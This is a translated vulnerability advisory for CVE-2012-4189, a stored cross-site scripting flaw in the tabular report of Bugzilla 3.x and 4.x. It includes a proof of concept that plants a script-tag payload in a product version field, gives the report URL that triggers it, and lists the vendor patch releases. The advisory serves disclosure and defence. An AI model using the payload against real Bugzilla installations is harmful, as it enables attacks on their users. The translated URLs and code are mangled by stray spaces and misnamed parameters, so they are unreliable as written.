Release date:
Updated on:
Affected Systems:
Mozilla Bugzilla 4.x
Mozilla Bugzilla 3.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56504
Cve id: CVE-2012-4189
Bugzilla is an open-source defect tracking system that manages the entire lifecycle of defects in software development, such as submitting, repairing, and disabling defects.
Bugzilla does not properly filter Field Values in the tabular report. Attackers can exploit this vulnerability to inject code, resulting in cross-site scripting.
<* Source: Mateusz Goik
Link: https://bugzilla.mozilla.org/show_bug.cgi? Id = 790296
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
PoC:
Http: // localhost/cgi-bin/bug/editversions. cgi? Action = add & product = TestProduct->
Version: "> <script> alert (1); </script>
Add new bug to "TestProduct" with version "> <script> alert (1); </script>
Http: // localhost/cgi-bin/bug/query. cgi? Format = report-table->
Horizontal Axis: Version
Shocould be the results: Version: "> <script> alert (1); </script>
-> Generate Report
Http: // localhost/cgi-bin/bug/report. cgi? X_axis_field = version & region = & query_format = report-table & region = allwordssubstr & region = & resolution = --- & longdesc_type = allwordssubstr & longdesc = & region = allwordssubstr & bug_file_loc & keywords_type = allwords & keywords = & deadlinefrom = & deadlineto = & bug_id = & bug_id_type = anyexact & version = % 22% 3E % 3 Cscript % 3 Ealert % 281% 29% 3B % 3C % 2 fscript % 3E & types = 1 & emailtype1 = substring & email1 = & types = 1 & emailreporter2 = 1 & emailcc2 = 1 & emailtype2 = substring & email2 = & emaillongdesc3 = 1 & emailtype3 = substring & email3 = & chfieldvalue = & chfieldfrom = & chfieldto = Now & j_top = AND & f1 = noop & o1 = noop & v1 = & format = table & action = wrap
Result:
+ OColumn. field + "& amp; version ="> <script> alert (1); </script> '>"
ElLiner. innerHTML = "<a href = 'buglist. cgi? Action = wrap & amp; resolution = --- & amp; version = "> <script> alert (1); </script> '>"
<A href = "buglist. cgi? Action = wrap & amp; resolution = --- & amp; version = "> <script> alert (1); </script>"> 5 </a>
<A href = "buglist. cgi? Action = wrap & amp; resolution = --- & amp; = % 20 & amp; version = "> <script> alert (1 ); </script> "> 5 </a>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Mozilla
-------
The vendor has released patch 3.6.12, 4.0.9, 4.2.4, and 4.4rc1 to fix this security problem. Please download the patch from the vendor's homepage:
Http://www.mozilla.org/security/